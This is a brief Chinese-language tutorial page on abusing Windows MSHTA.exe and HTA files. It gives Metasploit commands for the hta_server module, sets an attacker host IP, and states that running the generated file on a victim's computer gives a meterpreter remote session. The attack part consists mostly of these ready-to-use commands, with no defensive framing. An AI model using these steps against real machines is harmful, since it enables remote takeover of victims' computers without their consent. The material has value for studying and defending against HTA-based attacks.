資料結構
網路
RDBMS
作業系統
Java
MS Excel
iOS
HTML
CSS
Android
Python
C 程式設計
C++
C#
MongoDB
MySQL
Javascript
PHP
物理
化學
生物
數學
英語
經濟學
心理學
社會研究
時裝研究
法律研究使用 HTA 檔案(MSHTA.exe)駭客
負責執行 HTA(HTML 應用程式)檔案的 Windows 作業系統實用程式,我們可以在 JavaScript 或 VBScript 中使用這些實用程式。你可以使用 Microsoft MSHTA.exe 工具解釋這些檔案。
Metasploit 包含“HTA Web 伺服器”模組,該模組生成惡意 hta 檔案。此模組託管一個 HTML 應用程式(HTA),在開啟後將透過 Powershell 執行有效負載。
惡意 HTA 檔案
在 Kali Linux 中開啟 Metasploit 並輸入以下命令,以生成惡意 HTA 檔案,例如;
- use exploit/windows/misc/hta_server
- set srvhost 192.168.1.109
- set lhost 192.168.1.109
- exploit
現在,透過受害者計算機上的mshta.exe ,在目標計算機上執行惡意程式碼,來獲取 meterpreter 會話。
更新於:2020-09-23
2K+ 次瀏覽
廣告